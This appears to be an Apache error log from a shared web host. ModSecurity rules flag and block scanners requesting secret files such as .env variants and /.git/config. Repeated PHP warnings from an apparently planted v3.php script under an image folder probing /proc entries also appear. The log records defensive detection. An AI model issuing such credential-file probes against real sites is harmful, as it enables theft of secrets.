[Mon May 11 17:39:18.519952 2026] [security2:error] [pid 1412074:tid 1412088] [client 88.151.34.35:43568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.backup"] [unique_id "agH4JjJnyuKVXoStDhbPZQAAAEw"]
[Mon May 11 17:39:18.524882 2026] [:error] [pid 1416109:tid 1416134] [client 88.151.34.35:43510] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.530786 2026] [security2:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JjJnyuKVXoStDhbPaAAAAEM"]
[Mon May 11 17:39:18.538737 2026] [security2:error] [pid 1411099:tid 1411102] [client 88.151.34.35:43736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuQAAAAE"]
[Mon May 11 17:39:18.539681 2026] [security2:error] [pid 1411201:tid 1411269] [client 88.151.34.35:43560] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agH4Jfy_GXSWIKeli0sO1AAAAJg"]
[Mon May 11 17:39:18.542944 2026] [security2:error] [pid 1411099:tid 1411117] [client 88.151.34.35:43546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jg-Qm4vhlWBPlMjTuwAAABE"]
[Mon May 11 17:39:18.543014 2026] [security2:error] [pid 1411201:tid 1411269] [client 88.151.34.35:43560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.local"] [unique_id "agH4Jfy_GXSWIKeli0sO1AAAAJg"]
[Mon May 11 17:39:18.538743 2026] [security2:error] [pid 1411099:tid 1411114] [client 88.151.34.35:43670] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/public/.env"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvAAAAA4"]
[Mon May 11 17:39:18.550142 2026] [security2:error] [pid 1411099:tid 1411114] [client 88.151.34.35:43670] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/public/.env"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvAAAAA4"]
[Mon May 11 17:39:18.556078 2026] [security2:error] [pid 1411055:tid 1411066] [client 88.151.34.35:43584] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JkWKUxpmnkK7zHyXpQAAAQk"]
[Mon May 11 17:39:18.557560 2026] [security2:error] [pid 1411201:tid 1411269] [client 88.151.34.35:43560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jfy_GXSWIKeli0sO1AAAAJg"]
[Mon May 11 17:39:18.565642 2026] [security2:error] [pid 1411201:tid 1411264] [client 88.151.34.35:43634] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jfy_GXSWIKeli0sO1gAAAJI"]
[Mon May 11 17:39:18.567451 2026] [:error] [pid 1416109:tid 1416151] [client 88.151.34.35:43694] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.568782 2026] [:error] [pid 1411055:tid 1411076] [client 88.151.34.35:43612] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.569067 2026] [security2:error] [pid 1411099:tid 1411111] [client 88.151.34.35:43678] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvwAAAAs"]
[Mon May 11 17:39:18.569255 2026] [security2:error] [pid 1411099:tid 1411111] [client 88.151.34.35:43678] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvwAAAAs"]
[Mon May 11 17:39:18.576264 2026] [security2:error] [pid 1411099:tid 1411111] [client 88.151.34.35:43678] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvwAAAAs"]
[Mon May 11 17:39:18.705189 2026] [security2:error] [pid 1411099:tid 1411114] [client 88.151.34.35:43670] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jg-Qm4vhlWBPlMjTvAAAAA4"]
[Mon May 11 17:39:18.741903 2026] [security2:error] [pid 1411201:tid 1411258] [client 88.151.34.35:43642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4Jfy_GXSWIKeli0sO0wAAAIw"]
[Mon May 11 17:39:18.754041 2026] [security2:error] [pid 1412074:tid 1412088] [client 88.151.34.35:43568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JjJnyuKVXoStDhbPZQAAAEw"]
[Mon May 11 17:39:18.847734 2026] [security2:error] [pid 1411055:tid 1411063] [client 88.151.34.35:43600] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.staging"] [unique_id "agH4JkWKUxpmnkK7zHyXpgAAAQY"]
[Mon May 11 17:39:18.848244 2026] [security2:error] [pid 1411055:tid 1411063] [client 88.151.34.35:43600] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/.env.staging"] [unique_id "agH4JkWKUxpmnkK7zHyXpgAAAQY"]
[Mon May 11 17:39:18.849115 2026] [:error] [pid 1412074:tid 1412094] [client 88.151.34.35:43528] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:18.909810 2026] [:error] [pid 1412074:tid 1412099] [client 88.151.34.35:43496] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:19.033979 2026] [security2:error] [pid 1411055:tid 1411063] [client 88.151.34.35:43600] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ns1.webshop.totalcloud.fr"] [uri "/403.shtml"] [unique_id "agH4JkWKUxpmnkK7zHyXpgAAAQY"]
[Mon May 11 17:39:19.224881 2026] [:error] [pid 1411055:tid 1411071] [client 88.151.34.35:43468] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.089420 2026] [:error] [pid 1412074:tid 1412099] [client 88.151.34.35:43496] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.090237 2026] [:error] [pid 1412074:tid 1412088] [client 88.151.34.35:43568] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.090801 2026] [:error] [pid 1411099:tid 1411114] [client 88.151.34.35:43670] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.091787 2026] [:error] [pid 1411055:tid 1411071] [client 88.151.34.35:43468] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.091949 2026] [:error] [pid 1416109:tid 1416151] [client 88.151.34.35:43694] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.091968 2026] [:error] [pid 1411201:tid 1411424] [client 88.151.34.35:43508] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.092092 2026] [:error] [pid 1412074:tid 1412079] [client 88.151.34.35:34296] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093063 2026] [:error] [pid 1411099:tid 1411117] [client 88.151.34.35:43546] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093074 2026] [:error] [pid 1411055:tid 1411076] [client 88.151.34.35:43612] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093219 2026] [:error] [pid 1416109:tid 1416134] [client 88.151.34.35:43510] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093260 2026] [:error] [pid 1411201:tid 1411264] [client 88.151.34.35:43634] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.091697 2026] [:error] [pid 1411201:tid 1411258] [client 88.151.34.35:43642] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.092103 2026] [:error] [pid 1411055:tid 1411063] [client 88.151.34.35:43600] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093560 2026] [:error] [pid 1416109:tid 1416132] [client 88.151.34.35:43484] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.092400 2026] [:error] [pid 1411201:tid 1411269] [client 88.151.34.35:43560] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093633 2026] [:error] [pid 1411099:tid 1411111] [client 88.151.34.35:43678] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.093748 2026] [:error] [pid 1411055:tid 1411066] [client 88.151.34.35:43584] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.094025 2026] [:error] [pid 1416109:tid 1416147] [client 88.151.34.35:43628] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.094832 2026] [:error] [pid 1411099:tid 1411116] [client 88.151.34.35:43522] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.095066 2026] [:error] [pid 1411201:tid 1411268] [client 88.151.34.35:43728] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.095281 2026] [:error] [pid 1412074:tid 1412085] [client 88.151.34.35:43646] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.096018 2026] [:error] [pid 1424905:tid 1424920] [client 88.151.34.35:43706] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.096364 2026] [:error] [pid 1412074:tid 1412094] [client 88.151.34.35:43528] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.096891 2026] [:error] [pid 1424905:tid 1424913] [client 88.151.34.35:43654] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.097464 2026] [:error] [pid 1424905:tid 1424909] [client 88.151.34.35:43540] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:22.098439 2026] [:error] [pid 1424905:tid 1424917] [client 88.151.34.35:43718] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 17:39:49.661720 2026] [authz_core:error] [pid 1411055:tid 1411065] [client 47.128.125.36:59800] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/sodium_compat/src/error_log
[Mon May 11 17:39:51.721939 2026] [ssl:error] [pid 1412074:tid 1412093] (EAI 2)Name or service not known: [client 184.33.139.132:49192] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 17:39:51.721990 2026] [ssl:error] [pid 1412074:tid 1412093] AH01941: stapling_renew_response: responder error
[Mon May 11 17:39:52.254809 2026] [ssl:error] [pid 1411099:tid 1411109] (EAI 2)Name or service not known: [client 184.33.139.132:49194] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 17:39:52.254837 2026] [ssl:error] [pid 1411099:tid 1411109] AH01941: stapling_renew_response: responder error
[Mon May 11 17:39:53.073567 2026] [ssl:error] [pid 1412074:tid 1412088] (EAI 2)Name or service not known: [client 184.33.139.132:49206] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 17:39:53.073597 2026] [ssl:error] [pid 1412074:tid 1412088] AH01941: stapling_renew_response: responder error
[Mon May 11 17:40:10.379085 2026] [security2:error] [pid 1416109:tid 1416140] [client 43.164.0.96:36548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH4WlV4kyjgo4bQBUhv-QAAAMo"]
[Mon May 11 17:40:40.238358 2026] [authz_core:error] [pid 1411055:tid 1411061] [client 47.128.125.74:37458] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-supports/error_log
[Mon May 11 17:42:08.431963 2026] [security2:error] [pid 1411055:tid 1411080] [client 176.65.139.168:55178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agH40EWKUxpmnkK7zHyZKwAAARc"]
[Mon May 11 17:42:08.432292 2026] [security2:error] [pid 1411055:tid 1411080] [client 176.65.139.168:55178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agH40EWKUxpmnkK7zHyZKwAAARc"]
[Mon May 11 17:42:08.433481 2026] [security2:error] [pid 1411055:tid 1411080] [client 176.65.139.168:55178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.env.local"] [unique_id "agH40EWKUxpmnkK7zHyZKwAAARc"]
[Mon May 11 17:42:08.544152 2026] [security2:error] [pid 1416109:tid 1416150] [client 34.130.147.44:59392] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agH40FV4kyjgo4bQBUhxBAAAANQ"]
[Mon May 11 17:42:08.544398 2026] [security2:error] [pid 1416109:tid 1416150] [client 34.130.147.44:59392] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agH40FV4kyjgo4bQBUhxBAAAANQ"]
[Mon May 11 17:42:08.544808 2026] [core:error] [pid 1416109:tid 1416150] [client 34.130.147.44:59392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 17:42:08.545311 2026] [security2:error] [pid 1416109:tid 1416150] [client 34.130.147.44:59392] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.castiglionecf.castiglionecorporatefinance.fr"] [uri "/.git/config"] [unique_id "agH40FV4kyjgo4bQBUhxBAAAANQ"]
PHP Warning:  filesize(): stat failed for /proc/54/task/54/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/54/task/54/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/54/task/54/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/54/task/54/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/37/task/37/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/37/task/37/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/37/task/37/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/37/task/37/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:44:33.718502 2026] [security2:error] [pid 1416109:tid 1416129] [client 119.28.100.145:34486] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agH5YVV4kyjgo4bQBUhx4AAAAMA"]
[Mon May 11 17:44:39.485321 2026] [security2:error] [pid 1424905:tid 1424926] [client 119.28.100.145:58548] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agH5Z4W8yzYoWG_eyCWyogAAAVI"], referer: http://www.rixonephotography.com
[Mon May 11 17:45:11.703084 2026] [ssl:error] [pid 1411201:tid 1411249] (EAI 2)Name or service not known: [client 18.202.77.254:57956] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:45:11.703427 2026] [ssl:error] [pid 1411201:tid 1411249] AH01941: stapling_renew_response: responder error
